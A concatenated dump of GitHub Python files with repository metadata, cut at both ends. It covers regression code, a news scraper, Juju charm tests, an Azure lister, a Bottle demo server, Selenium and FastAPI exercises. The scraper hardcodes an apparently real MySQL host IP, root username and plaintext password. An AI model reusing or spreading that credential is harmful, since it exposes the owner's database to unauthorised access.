mat(yArr).T\n xTx = xMat.T * xMat\n # linalg.det() 函数是用来求得矩阵的行列式的\n # 如果矩阵的行列式为0,则这个矩阵是不可逆的,就无法进行接下来的运算\n if linalg.det(xTx) == 0.0:\n print('this matrix can not do inverse')\n return\n ws = xTx.I * (xMat.T * yMat)\n return ws\n\ndef test():\n xArr, yArr = loadDataSet('../AiLearning/data/8.Regression/data.txt')\n ws = standRegres(xArr, yArr)\n xMat = mat(xArr)\n yMat = mat(yArr)\n print(ws)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.scatter(xMat[:, 1].flatten().A[0], yMat.T[:, 0].flatten().A[0])\n xCopy = xMat.copy()\n xCopy.sort(0)\n yHat = xCopy * ws\n print('相关性')\n print(corrcoef(yHat.T, yMat))\n ax.plot(xCopy[:, 1], yHat)\n plt.show()\n\ndef lwlr(testPoint, xArr, yArr, k=1.0):\n xMat = mat(xArr)\n yMat = mat(yArr).T\n m = shape(xMat)[0]\n weights = mat(eye((m)))\n\n for j in range(m):\n diffMat = testPoint - xMat[j, :]\n weights[j, j] = exp(diffMat * diffMat.T / (-2 * k ** 2))\n xTx = xMat.T * (weights * xMat)\n if linalg.det(xTx) == 0.0:\n print('this matrix can not do inverse')\n return\n ws = xTx.I * (xMat.T * (weights * yMat))\n return testPoint * ws\n\ndef lwlrTest(testArr, xArr, yArr, k=1.0):\n m = shape(testArr)[0]\n yHat = zeros(m)\n for i in range(m):\n yHat[i] = lwlr(testArr[i], xArr, yArr, k)\n return yHat\n\ndef test2():\n xArr, yArr = loadDataSet('../AiLearning/data/8.Regression/data.txt')\n yHat = lwlrTest(xArr, xArr, yArr, 0.03)\n xMat = mat(xArr)\n strInd = xMat[:, 1].argsort(0)\n xSort = xMat[strInd][:, 0, :]\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(xSort[:, 1], yHat[strInd])\n ax.scatter(xMat[:,1].flatten().A[0], mat(yArr).T.flatten().A[0] , s=2, c='red')\n plt.show()\n\ndef rssError(yArr, yHatArr):\n return ((yArr - yHatArr) ** 2).sum()\n\ndef abaloneTest():\n abX, abY = loadDataSet('../AiLearning/data/8.Regression/abalone.txt')\n oldyHat01 = lwlrTest(abX[0: 99], abX[0: 99], abY[0: 99], 0.1)\n oldyHat1 = lwlrTest(abX[0: 99], abX[0: 99], abY[0: 99], 1)\n oldyHat10 = lwlrTest(abX[0: 99], abX[0: 99], abY[0: 99], 10)\n\n print('oldyHat01 error size is:', rssError(abY[0: 99], oldyHat01.T))\n print('oldyHat01 error size is:', rssError(abY[0: 99], oldyHat1.T))\n print('oldyHat01 error size is:', rssError(abY[0: 99], oldyHat10.T))\n\n newyHat01 = lwlrTest(abX[100:199], abX[0:99], abY[0:99], 0.1)\n newyHat1 = lwlrTest(abX[100:199], abX[0:99], abY[0:99], 1)\n newyHat10 = lwlrTest(abX[100:199], abX[0:99], abY[0:99], 10)\n print('new yHat01 error Size is :' , rssError(abY[0:99], newyHat01.T))\n print('new yHat1 error Size is :' , rssError(abY[0:99], newyHat1.T))\n print('new yHat10 error Size is :' , rssError(abY[0:99], newyHat10.T))\n\n standSw = standRegres(abX[0: 99], abY[0: 99])\n standSwHat = mat(abX[100: 199]) * standSw\n print('standRegress error Size is:', rssError(abY[100: 199], standSwHat.T.A))\n\ndef rdigeRegres(xMat, yMat, lam=0.2):\n xTx = xMat.T * xMat\n denom = xTx + eye(shape(xMat)[1]) * lam\n\n if linalg.det(denom) == 0.0:\n print('this matrix can not do inverse')\n return\n ws = denom.I * (xMat.T * yMat)\n return ws\n\ndef rdigeRegresTest(xArr, yArr):\n xMat = mat(xArr)\n yMat = mat(yArr).T\n yMean = mean(yMat, 0)\n yMat = yMat - yMean\n xMeans = mean(xMat, 0)\n xVar = var(xMat, 0)\n xMat = (xMat - xMeans) / xVar\n numTestPts = 30\n wMat = zeros((numTestPts, shape(xMat)[1]))\n for i in range(numTestPts):\n ws = rdigeRegres(xMat, yMat, exp(i - 10))\n wMat[i, :] = ws.T\n return wMat\n\ndef test3():\n abX,abY = loadDataSet('../AiLearning/data/8.Regression/abalone.txt')\n ridgeWeights = rdigeRegresTest(abX, abY)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(ridgeWeights)\n plt.show()\n\ndef regularize(xMat): # 按列进行规范化\n inMat = xMat.copy()\n inMeans = mean(inMat, 0) # 计算平均值然后减去它\n inVar = var(inMat, 0) # 计算除以Xi的方差\n inMat = (inMat - inMeans) / inVar\n return inMat\n\ndef stageWise(xArr, yArr, eps=0.01, numIt=100):\n xMat = mat(xArr)\n yMat = mat(yArr).T\n yMean = mean(yMat, 0)\n yMat = yMat - yMean\n xMat = regularize(xMat)\n m, n = shape(xMat)\n ws = zeros((n, 1))\n wsTest = ws.copy()\n wsMax = ws.copy()\n returnMat = zeros((numIt, n))\n\n for i in range(numIt):\n print(ws.T)\n lowestError = inf\n for j in range(n):\n for sign in [-1, 1]:\n wsTest = ws.copy()\n wsTest[j] += eps * sign\n yTest = xMat * wsTest\n rssE = rssError(xMat.A, yTest.A)\n if rssE < lowestError:\n lowestError = rssE\n wsMax = wsTest\n ws = wsMax.copy()\n returnMat[i, :] = ws.T\n return returnMat\n\ndef test4():\n xArr, yArr = loadDataSet('../AiLearning/data/8.Regression/abalone.txt')\n print(stageWise(xArr, yArr, 0.01, 200))\n xMat = mat(xArr)\n yMat = mat(yArr).T\n xMat = regularize(xMat)\n yM = mean(yMat,0)\n yMat = yMat - yM\n weights = standRegres(xMat, yMat.T)\n print(weights.T)\n\ntest4()","repo_name":"eng-cc/learn","sub_path":"ml/ML in action/8/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"12346735154","text":"import os\r\nimport uuid\r\n\r\nimport pymysql\r\nimport requests\r\n\r\n# 访问澎湃并得到响应\r\nimport time\r\n\r\nimport sys\r\nfrom bs4 import BeautifulSoup\r\n\r\n# 设置源\r\nnewsSource = \"来自澎湃新闻\"\r\n# 设置域名前缀\r\npreUrl = \"http://dubidubi.iask.in/repoter\"\r\n# 连接数据库\r\nconn = pymysql.connect(host='119.29.28.81', port=3306, user='root', passwd='Linzijie123!!', db='gzh', charset='utf8')\r\n# 获取数据库游标\r\ncursor = conn.cursor()\r\nnewsurl = \"http://www.thepaper.cn/\"\r\n# 得到当前时间的字符串\r\ntodaystr = time.strftime(\"%Y-%m-%d\", time.localtime())\r\ncurrentTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\r\nresp = requests.get(newsurl)\r\n# 设置响应的编码\r\nresp.encoding = \"utf-8\"\r\n# 得到响应的h5并解析\r\nhtml5 = resp.text\r\nh5soup = BeautifulSoup(html5, \"html.parser\")\r\n# 解析h5的css\r\ndivs = h5soup.select(\"div.news_li\")\r\nfor div in divs:\r\n ataglist = div.select(\"div.news_tu > a\")\r\n if not ataglist:\r\n break\r\n # 得到新闻标题\r\n title = div.select(\"h2 > a\")\r\n # 得到新闻内容\r\n news_content = div.select(\"p\")\r\n # 得到新闻链接\r\n ahref = \"http://www.thepaper.cn/\" + ataglist[0].get(\"href\")\r\n # 得到新闻图片\r\n imglist = ataglist[0].select(\"img\")\r\n imghref = \"http:\" + imglist[0].get(\"src\")\r\n # 访问图片服务器,并存储图片\r\n img_resp = requests.get(imghref)\r\n if img_resp.status_code == 200:\r\n # 新建文件夹的路径\r\n path = sys.argv[1] + todaystr\r\n if not os.path.exists(path):\r\n os.mkdir(path)\r\n # 指定文件路径存放图片\r\n finpath = path + \"/\" + imghref[10:20] + str(uuid.uuid1())[0:15] + \".jpg\"\r\n open(finpath, \"wb\").write(img_resp.content)\r\n img_url = finpath.find(\"/news\")\r\n cursor.execute('insert news_info(title,create_time,img_url,original_web_url,source,source_id) values(%s,%s,%s,%s,%s,%s)',\r\n (title[0].text, currentTime, preUrl + finpath[img_url:], ahref, newsSource, 100))\r\nconn.commit()\r\ncursor.close()\r\nconn.close()\r\n","repo_name":"lzzzz4/dubidubi","sub_path":"src/main/resources/py/newsSpider.py","file_name":"newsSpider.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"} +{"seq_id":"12787569505","text":"\r\n# Importing the used modules\r\nimport gc\r\n# The lists of the students names for both classes\r\nPythonStudents = [\"Abdoh\", \"Erick\", \"Stive\", \"Moe\", \"Susan\", \"Sarah\",\"Helen\", \"Harry\", \"Mark\", \"Josh\", \"Shon\"]\r\nWebAppStudents = [\"Aaron\", \"Moe\", \"Maria\", \"Josh\", \"Erick\", \"A\", \"Susan\", \"Mark\", \"Jim\", \"Brendan\", \"Shon\", \"Paul\", \"Barry\", \"Julia\"]\r\nprint(\"\")\r\n# printing the students names who are found in both classes, by iterating in both of the names lists\r\nprint('Students who are in both classes : ')\r\nfor PythonStudent in PythonStudents:\r\n for WebAppStudent in WebAppStudents:\r\n # The condition where a student is found in both classes\r\n if PythonStudent == WebAppStudent:\r\n print(PythonStudent)\r\n\r\nprint(\"\")\r\nprint('=========================')\r\nprint(\"\")\r\nprint('Students who are not common in both the classes : ')\r\n# Initializing the detection indicator value\r\nIndicator=0\r\nfor PythonStudent in PythonStudents:\r\n for WebAppStudent in WebAppStudents:\r\n if PythonStudent == WebAppStudent:\r\n # If each name in the first students group has a match in the second students group \r\n # then we set the indicator to 1 to not include this name in the not common list of names \r\n Indicator=1\r\n # If a match discovered (indicator=1) then we will not print this name \r\n # and we will reset the indicator back to its original value (0) to compare \r\n # the next name from the fist group with all the names of the second group\r\n if Indicator==1:\r\n Indicator=0\r\n # If no match found then this student is not common in both classes, so we print his/her name\r\n elif Indicator==0:\r\n print(PythonStudent)\r\n\r\nprint(\"\")\r\nprint('Exiting ...')\r\n# Freeing up the used resources\r\ndel PythonStudents \r\ndel WebAppStudents\r\ngc.collect()\r\nprint('End of the program, Thanks !')","repo_name":"mannsmoe/DeepLearningSpring2018","sub_path":"Lab1/Lab1Req4.py","file_name":"Lab1Req4.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28956008186","text":"import io\nimport json\nimport unittest\n\nfrom unittest.mock import MagicMock, ANY\n\nfrom charm import OpenApiaryCharm\nfrom ops.model import ActiveStatus\nfrom ops.testing import Harness\n\n\n# Partial test fixture only\nNODE_VERSION_INFO = \"\"\"\n{\n \"name\": \"open-apiary\",\n \"version\": \"1.1.1\",\n \"description\": \"Apiary management software\",\n \"author\": \"Simon Emms\",\n \"private\": true,\n \"license\": \"MIT\",\n \"main\": \"./server/main\"\n}\n\"\"\"\n\nCOMPLETE_MYSQL_DATA_BAG = {\n \"database\": \"testdatabase\",\n \"host\": \"mysql-db-server\",\n \"port\": 3306,\n \"user\": \"testuser\",\n \"password\": \"foobar\",\n}\n\nINCOMPLETE_MYSQL_DATA_BAG = {\n \"database\": \"testdatabase\",\n}\n\n\nclass TestCharm(unittest.TestCase):\n def setUp(self):\n self.harness = Harness(OpenApiaryCharm)\n self.addCleanup(self.harness.cleanup)\n self.harness.begin()\n # NOTE(jamespage)\n # Mock out push and pull as not implemented in test harness\n container = self.harness.model.unit.get_container(\"open-apiary\")\n container.push = MagicMock()\n container.pull = MagicMock()\n # Use of a lambda here just makes sure everytime the pull method is\n # executed a new StringIO reader is created.\n container.pull.side_effect = lambda *args: io.StringIO(NODE_VERSION_INFO)\n self.addCleanup(container.push)\n self.addCleanup(container.pull)\n self.maxDiff = None\n\n def _test_config_changed(\n self, weather_token: str = None, debug: bool = False\n ) -> None:\n \"\"\"Base config_changed test handler\"\"\"\n # Expected plan with default config\n expected_plan = {\n \"services\": {\n \"open-apiary\": {\n \"override\": \"replace\",\n \"summary\": \"open-apiary\",\n \"command\": \"/usr/local/bin/npm start\",\n \"startup\": \"enabled\",\n \"environment\": {\n \"PORT\": \"3000\",\n \"DATA_PATH\": \"/data\",\n \"UPLOAD_PATH\": \"/uploads\",\n \"LOG_DESTINATION\": \"/data/open-apiary.log\",\n \"LOG_LEVEL\": \"debug\" if debug else \"info\",\n \"WEATHER_API_KEY\": weather_token or \"\",\n \"CONFIG_CHECKSUM\": ANY,\n },\n }\n }\n }\n\n # Get the open-apiary container from the model\n container = self.harness.model.unit.get_container(\"open-apiary\")\n self.harness.update_config(\n {\n \"weather-api-token\": weather_token,\n \"debug\": debug,\n }\n )\n # Everything happens on config-changed so just emit this event\n # Get the plan now we've run PebbleReady\n updated_plan = self.harness.get_container_pebble_plan(\"open-apiary\").to_dict()\n # Check we've got the plan we expected\n self.assertEqual(expected_plan, updated_plan)\n # Check configuration file pushed to container\n container.push.assert_called_once_with(\n \"/opt/app/config.json\",\n json.dumps(\n self.harness.charm._open_apiary_config(),\n sort_keys=True,\n indent=2,\n ),\n make_dirs=True,\n )\n\n # Check the service was started\n service = container.get_service(\"open-apiary\")\n self.assertTrue(service.is_running())\n # Ensure we set an ActiveStatus with no message\n self.assertEqual(self.harness.model.unit.status, ActiveStatus())\n self.assertEqual(self.harness.get_workload_version(), \"1.1.1\")\n\n def test_config_changed(self):\n \"\"\"config changed with default options\"\"\"\n self._test_config_changed()\n\n def test_config_changed_weather_token_set(self):\n \"\"\"config changed with token and debug logging\"\"\"\n self._test_config_changed(weather_token=\"mytoken\", debug=True)\n\n def test_mysql_relation(self):\n \"\"\"mysql-database relation test\"\"\"\n relation_id = self.harness.add_relation(\"mysql-database\", \"mysql\")\n self.harness.add_relation_unit(relation_id, \"mysql/0\")\n\n # Check incomplete data handling - should use sqlite\n self.harness.update_relation_data(\n relation_id, \"mysql/0\", INCOMPLETE_MYSQL_DATA_BAG\n )\n expected_oa_config = {\n \"db\": {\"database\": \"/data/db.sql\", \"type\": \"sqlite\"},\n \"jwt\": {\"secret\": ANY},\n }\n self.assertEqual(expected_oa_config, self.harness.charm._open_apiary_config())\n\n # Check complete data handling - should use mysql\n self.harness.update_relation_data(\n relation_id, \"mysql/0\", COMPLETE_MYSQL_DATA_BAG\n )\n expected_oa_config = {\n \"db\": {\n \"database\": \"testdatabase\",\n \"host\": \"mysql-db-server\",\n \"password\": \"foobar\",\n \"port\": 3306,\n \"type\": \"mysql\",\n \"username\": \"testuser\",\n },\n \"jwt\": {\"secret\": ANY},\n }\n self.assertEqual(expected_oa_config, self.harness.charm._open_apiary_config())\n\n # TODO(jamespage)\n # write relation removal tests once Harness supports this\n # https://github.com/canonical/operator/pull/460\n","repo_name":"javacruft/charm-open-apiary","sub_path":"tests/test_charm.py","file_name":"test_charm.py","file_ext":"py","file_size_in_byte":5304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74882164913","text":"'''\nQuestion : 1.5 One way\n\ndescription : Given two strings, write a function to check \n if they are one edit ( or zero edits ) away.\n\nexample :\n\n pale , ple ---> true\n pales, pale ---> true\n pale , bale ---> true\n pale , bake ---> false\n\n'''\n\ndef is_one_char_dif( s1, s2 ):\n # s1 and s2 must be of the same size\n num_edits = 0\n for i in range( 0, len( s1 ) ):\n if s1[ i ] != s2[ i ]:\n num_edits += 1\n\n return num_edits <= 1\n\ndef is_missing_one_char( small, big ):\n num_edits = 0\n i_small = 0\n i_big = 0\n while num_edits <=1 and i_small < len( small ) :\n if small[ i_small ] != big[ i_big ]:\n num_edits += 1\n i_big += 1\n else:\n i_small += 1\n i_big += 1\n\n return num_edits <= 1\n\n\ndef one_way( s1, s2 ):\n size_dif = abs( len( s1 ) - len( s2 ) )\n if size_dif > 1:\n return False\n \n small = s1\n big = s2\n if len( s2 ) < len( s1 ):\n small = s2\n big = s1\n \n if size_dif == 1:\n return is_missing_one_char( small, big )\n else:\n return is_one_char_dif( small, big )\n\nif __name__ == '__main__':\n #s1, s2 = 'pale' , 'ple' # True\n #s1, s2 = 'pales', 'pale' # True\n #s1, s2 = 'pale' , 'bale' # True\n #s1, s2 = 'pale' , 'bake' # False\n s1, s2 = 'acd', 'abcd' # True\n\n\n print( '\"{}\" \\t \"{}\"'.format( s1, s2 ) )\n if one_way( s1, s2 ):\n print( 'YES, they are one way ... or another' )\n else:\n print( 'NO, they are not one way' )","repo_name":"canislatranscoxus/interview","sub_path":"cracking/chapter_01/1_5/p1_5_01.py","file_name":"p1_5_01.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3727786856","text":"import logging\nimport json\nimport os\n\nfrom azure.mgmt.resource import ResourceManagementClient\n\n\ndef process_rg_instance(group):\n \"\"\"\n Get the relevant pieces of information from a ResourceGroup instance.\n \"\"\"\n return {\n \"Name\": group.name,\n \"Id\": group.id,\n \"Location\": group.location,\n \"Tags\": group.tags,\n \"Properties\": group.properties.provisioning_state \\\n if group.properties and group.properties.provisioning_state else None\n }\n\n\nasync def list_rgs(credentials, subscription_id):\n \"\"\"\n Get list of resource groups for the subscription id passed.\n \"\"\"\n list_of_resource_groups = []\n\n with ResourceManagementClient(credentials, subscription_id) as rg_client:\n try:\n for i in rg_client.resource_groups.list():\n list_of_resource_groups.append(process_rg_instance(i))\n \n except Exception as e:\n logging.error(\"encountered: {0}\".format(str(e)))\n\n return json.dumps(list_of_resource_groups)\n","repo_name":"Azure-Samples/azure-functions-python-list-resource-groups","sub_path":"src/get-list-of-azure-resource-groups-functionapp/GetListOfResourceGroups/resource_group_operations.py","file_name":"resource_group_operations.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"1787712964","text":"# -*- coding: utf-8 -*-\nfrom yield_data import *\n\ndef cleaner(data_type, yielder_type):\n\tin_dir_path, out_dir_path = \"./data/train/raw/\" + data_type + \"/\", \"./data/train/clean/\" + data_type + \"/\"\n\tyielder = yielder_type(in_dir_path)\n\tif not os.path.exists(out_dir_path):\n\t\tos.mkdir(out_dir_path)\n\tfor file_path, new_line_list in yielder:\n\t\tfile = codecs.open(out_dir_path + file_path, \"w\")\n\t\tfor line in new_line_list:\n\t\t\tfile.write(line.encode(\"utf-8\") + \"\\n\")\t\n\nif __name__ == \"__main__\":\n\tfor data_type, yielder_type in type_dict.iteritems():\n\t\tcleaner(data_type, yielder_type)\n","repo_name":"john820911/AI_contest","sub_path":"clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3849587270","text":"from bottle import Bottle, route, run\nfrom bottle import request, response\nfrom bottle import post, get, put, delete\nfrom json import dumps, loads\nfrom datetime import datetime\nfrom bin import benz_main\n\napp = Bottle()\n\nversion = 0\nquestioni = \"\"\nknowledgei = 0\nlab_view = \"0\"\nfakeq = 0 \nimg_url = \"\"\n#tags = [\"string\"]\nsolutioni = \"\"\n\n@app.hook('after_request')\ndef enable_cors():\n \"\"\"\n You need to add some headers to each request.\n Don't use the wildcard '*' for Access-Control-Allow-Origin in production.\n \"\"\"\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers['Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'\n response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n\ndef increment_version():\n global version\n if version < 5:\n version = version + 1\n global img_url\n img_url = benz_main.fnget_imgurls(version)\n \n@app.route('/hello')\ndef hello():\n #return \"Hello World!\"\n #q = benz_main.fnget_question(2)\n return q\n\n@app.route('/knowledge')\ndef new_knowledge():\n global knowledgei\n global questioni\n global solutioni\n print(knowledgei)\n print(solutioni)\n print(questioni)\n #return {\"version\": \"v\", \"question\":\"How to fix the fuel system injector? \",\"answer\":\" Cap off the cylinders in the following sequence - 1, 3, 2 and 4. After capping off each cylinder, crank the engine and see if the crank time reduces to 3 to 5 seconds. If it does, you have found your leaking cylinder.If not,proceed to the next cylinder\",\"tags\":[\"DD13\",\"fuel injector\"]}\n return {\"version\": knowledgei, \"question\": questioni, \"answer\": solutioni ,\"tags\":[\"dd13\",\"fuel\"]}\n@app.route('/solution')\ndef question():\n # value = request.body.read()\n #v = loads(value)\n prob = request.query.problem\n global version \n version = 2\n return {\"problem\" : \"you are the problem\", \"solution\": \"what can i do about that\", \"id\": 1}\n\n\n@app.route('/reset')\ndef change():\n new_version = request.query.version\n global version\n global img_url\n version = int(new_version)\n if version == 0:\n img_url = \"\"\n global knowledgei\n knowledgei = int(new_version)\n global lab_view\n lab_view = new_version\n global questioni\n questioni = \"\"\n global solutioni\n solutioni = \"\"\n\n@app.route('/change_lab')\ndef change_lab():\n new_version = request.query.version\n global lab_view\n lab_view = new_version\n\n@app.route('/fake')\ndef fake():\n increment_version()\n global version\n #if lab_view == \"0\" :\n # lab_view = \"1\"\n #elif lab_view == \"1\":\n # lab_view = \"0\"\n return str(version)\n\n@app.route('/solution', method='POST')\ndef solution_new():\n #write to db \n try:\n value = request.body.read()\n print(value)\n if value is not None:\n v = loads(value)\n print(v)\n #except:\n # print(\"error in solution post\")\n #query = dumps(v)\n # benz_main.fnwrite_solution(1,v[\"solution\"])\n global knowledgei\n knowledgei = 1\n global questioni\n questioni = v[\"problem\"]\n global solutioni\n solutioni = v[\"solution\"]\n except:\n print(v)\n # solution, keywords = benz_main.fnget_recent_solutions(1)\n #global tags\n return \"\"\n\n\n@app.route('/current_question')\ndef current_question():\n return {\"version\": version, \"img_url\":img_url}\n\n@app.route('/current_solution', method='POST')\ndef current_solution():\n return \"\"\n\n@app.route('/feedback')\ndef feedback():\n query_id = request.query.id\n return \"\"\n\n@app.route('/lab_view')\ndef lab():\n return {\"version\": lab_view}\n\n@app.route(\"/metrics\")\ndef metrics():\n global lab_view\n lab_view = \"1\"\n\n\n@app.route('/start')\ndef startn():\n global questioni\n questioni = request.query.search\n increment_version()\n return { \"start\" : \"I found a solution. I see that you have 2 of the 3 parts needed for the job in your bay. I have already requested for a fuel rail test cap and the part runner is on his way.\" , \"steps\":[\"Remove the valve cover and start the engine and let it idle. A small amount of white smoke is normal. If you don’t see smoke, one of the cylinders might be cracked\",\"You have to do a manual cylinder cut-off test to find the problematic cylinder\",\"One of your colleagues fixed a similar problem recently for the same engine. I can pull up his notes.\",\"This is what he did - Cap off the cylinders in the following sequence - 1, 3, 2 and 4. After capping off each cylinder, crank the engine and see if the crank time reduces to 3 to 5 seconds. If it does, you have found your leaking cylinder. If not, proceed to the next cylinder\"]}\n@app.route('/show')\ndef feedback():\n global version\n version = \"steps\"\n return nil\n# @app.route('/websocket')\n# def handle_websocket():\n# wsock = request.environ.get('wsgi.websocket')\n# if not wsock:\n# abort(400, 'Expected WebSocket request.')\n# while true:\n# try:\n# message = wsock.receive()\n# message = {\"problem\" : \"you are the problem\", \"solution\": \"what can i do about that\", \"tags\":[\"version\",\"truck\",\"version\"]}\n# wsock.send(dumps(message))\n# except WebSocketError:\n# break\n\nrun(app, host='172.30.0.163', port=8080, debug=True, reloader=True)\n\n","repo_name":"nithyarenga/daimler","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"26727103777","text":"import logging\n\nimport allure\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\n\nfrom page.base_page import BasePage\n\ndelay = 3 # seconds\n\n\nclass CartPage(BasePage):\n def __init__(self, driver):\n super().__init__(driver)\n\n empty_cart_text = \"There are no items in your cart.\"\n remove_from_cart_button = (By.CSS_SELECTOR, \"[name=\\\"remove_cart_item\\\"]\")\n cart_title = (By.CSS_SELECTOR, \"[class=\\\"cart wrapper\\\"] [class=\\\"card-title\\\"]\")\n cart_text = (By.CSS_SELECTOR, \"[class=\\\"text-center\\\"]\")\n unregistered_error_message = (By.CSS_SELECTOR, \"[class=\\\"error\\\"]\")\n unregistered_error_no_first_name_text = \"Customer Details: You must enter a first name.\"\n # unregistered_error_no_last_name_text = \"Customer Details: You must enter a last name.\"\n # unregistered_error_no_address_text = \"Customer Details: You must enter an address.\"\n # unregistered_error_no_city_text = \"Customer Details: You must enter a city.\"\n # unregistered_error_no_email_text = \"Customer Details: You must enter an email address.\"\n # unregistered_error_no_phone_text = \"Customer Details: You must enter a phone number.\"\n # unregistered_error_no_post_code_text = \"Customer Details: You must enter a postcode.\"\n # first_name_cart_input = (By.NAME, \"firstname\")\n # last_name_cart_input = (By.NAME, \"lastname\")\n # address1_cart_input = (By.NAME, \"address1\")\n # city_cart_input = (By.NAME, \"city\")\n # email_cart_input = (By.NAME, \"email\")\n # phone_cart_input = (By.CSS_SELECTOR, \"[class=\\\"input-group\\\"] [name=\\\"phone\\\"]\")\n # post_code_cart_input = (By.CSS_SELECTOR, \"[class=\\\"form-control\\\"][name=\\\"postcode\\\"]\")\n save_changes_button = (By.CSS_SELECTOR, \"[name=\\\"save_customer_details\\\"][type='submit']\")\n\n # agreement_check_box_shopping_form = (By.CSS_SELECTOR, \"[class=\\\"form-check\\\"][name=\\\"terms_agreed\\\"]\")\n\n @allure.step(\"Clicking Remove from Cart button\")\n def click_remove_from_cart_button(self):\n logging.info('Clicking Remove from Cart button')\n self.find(self.remove_from_cart_button).click()\n\n @allure.step(\"Checking remove button is Visible\")\n def if_remove_button_is_visible(self, driver):\n logging.debug('Waiting for Cart title appeared')\n WebDriverWait(driver, delay).until(EC.presence_of_element_located(CartPage.cart_title))\n logging.info('Checking remove button is Visible')\n self.find(self.remove_from_cart_button)\n\n @allure.step(\"Cleaning Cart\")\n def cleaning_cart(self, driver):\n logging.info('Cleaning Cart')\n try:\n CartPage.if_remove_button_is_visible(self, driver)\n CartPage.click_remove_from_cart_button(self)\n except NoSuchElementException:\n pass\n\n WebDriverWait(driver, delay).until(EC.presence_of_element_located(self.cart_text))\n logging.debug('Waiting empty cart text appeared')\n assert self.find(self.cart_text).text == self.empty_cart_text\n\n @allure.step(\"Getting unregistered error message text\")\n def get_unregistered_error_message_text(self):\n logging.info('Getting unregistered error message text')\n return self.find(self.unregistered_error_message).text\n\n @allure.step(\"Saving shopping cart changes\")\n def saving_shopping_cart_changes(self):\n logging.info('Saving shopping cart changes')\n self.find(self.save_changes_button).click()\n","repo_name":"LordScoutTG/Pytestfirst","sub_path":"page/cart_page.py","file_name":"cart_page.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71391481713","text":"\n# 5-14-22 Prior main file now called \"main_v1.py\" covers up to HW API 7\n# prior to being split into multiple files:\n# 1. main.py (new, simpler main file)\n# 2. sub files that are called by main.py: greetings.py, sums.py, maths.py\n\n\nfrom fastapi import FastAPI, HTTPException\nfrom pydantic import BaseModel\n\n\n# HTTPException from fastapi import HTTPException.\n# added the import of HTTPException from this article https://fastapi.tiangolo.com/tutorial/handling-errors/\n\napp = FastAPI()\n\n# START HOMEWORK APIs 5 6 7 ---------------------------------------------------------------------\n''' START REFERENCE URLS -------------------------\nNOTION https://www.notion.so/Api-Exercise-8c8c0119b01642c1a8b35e9f5bfecf8c\nhttps://fastapi.tiangolo.com/tutorial/body/\n--- END REFERENCE URLS --------------------------- \n'''\n# API 5: GET /api/v1/math/{operation}/{variable1}/(variable2} -> execute +,-,*,/ or return 404 if operation invalid\n# /api/v1/math/add/1/2\n@app.get(\"/api/v1/math/{operation}/{variable1}/{variable2}\")\nasync def PerformOperation5(operation: str,variable1: int,variable2: int):\n if operation == \"add\":\n ops=variable1+variable2\n return {\"ops\": ops}\n elif operation == \"sub\":\n ops = variable1 - variable2\n return {\"ops\": ops}\n elif operation == \"mult\":\n ops = variable1 * variable2\n return {\"ops\": ops}\n elif operation == \"div\":\n ops = variable1 / variable2\n return {\"ops\": ops}\n else:\n print(\"else branch\")\n raise HTTPException(status_code=404, detail=\"Item not found\")\n\n'''\nTo do later - create this endpoint with a dictionary -> \ndef add (X,Y):\n return X+Y\n def sub (X,Y):\n return X-Y\n def mult (X,Y):\n return X*Y\n def div (X,Y):\n return X/Y\n\n# I think I should use a dictionary here, but I need to relearn that - so using elif\n def OperationSelector(Ops, X, Y):\n if ops == \"add\":\n return add(X, Y)\n if ops == \"sub\":\n return sub(X, Y)\n if ops == \"mult\":\n return mult(X, Y)\n if ops == \"div\":\n return div(X, Y)\n else:\n return \"unknown operator - 404 error\"\n OperationSelector(operation,variable1,variable2)\n'''\n#return {test:\"testing api 5\"}\n\n\n#API 6: POST /api/v1/math/{operation} -> execute +,-,*,/ or return 404 if operation invalid\n# First POST, not a GET\n# /api/v1/math/add/1/2\n\n# following class taken from pydantic\nclass Item(BaseModel):\n variable1: int\n variable2: int\n\n'''\n@app.post(\"/trees/\")\nasync def create_trees(item: Item):\n return item\n@app.post(\"/api/v1/math/{operation}/items/\")\nasync def PerformOperation6(operation: str, item: Item):\nasync def PerformOperation6(item: Item):\n'''\n@app.post(\"/api/v1/math/{operation}\")\nasync def PerformOperation6(operation: str, item: Item):\n variable1: int = item.variable1\n variable2: int = item.variable2\n if operation == \"add\":\n ops=variable1+variable2\n return {\"ops\": ops}\n elif operation == \"sub\":\n ops = variable1 - variable2\n return {\"ops\": ops}\n elif operation == \"mult\":\n ops = variable1 * variable2\n return {\"ops\": ops}\n elif operation == \"div\":\n ops = variable1 / variable2\n return {\"ops\": ops}\n else:\n print(\"else branch\")\n raise HTTPException(status_code=404, detail=\"Item not 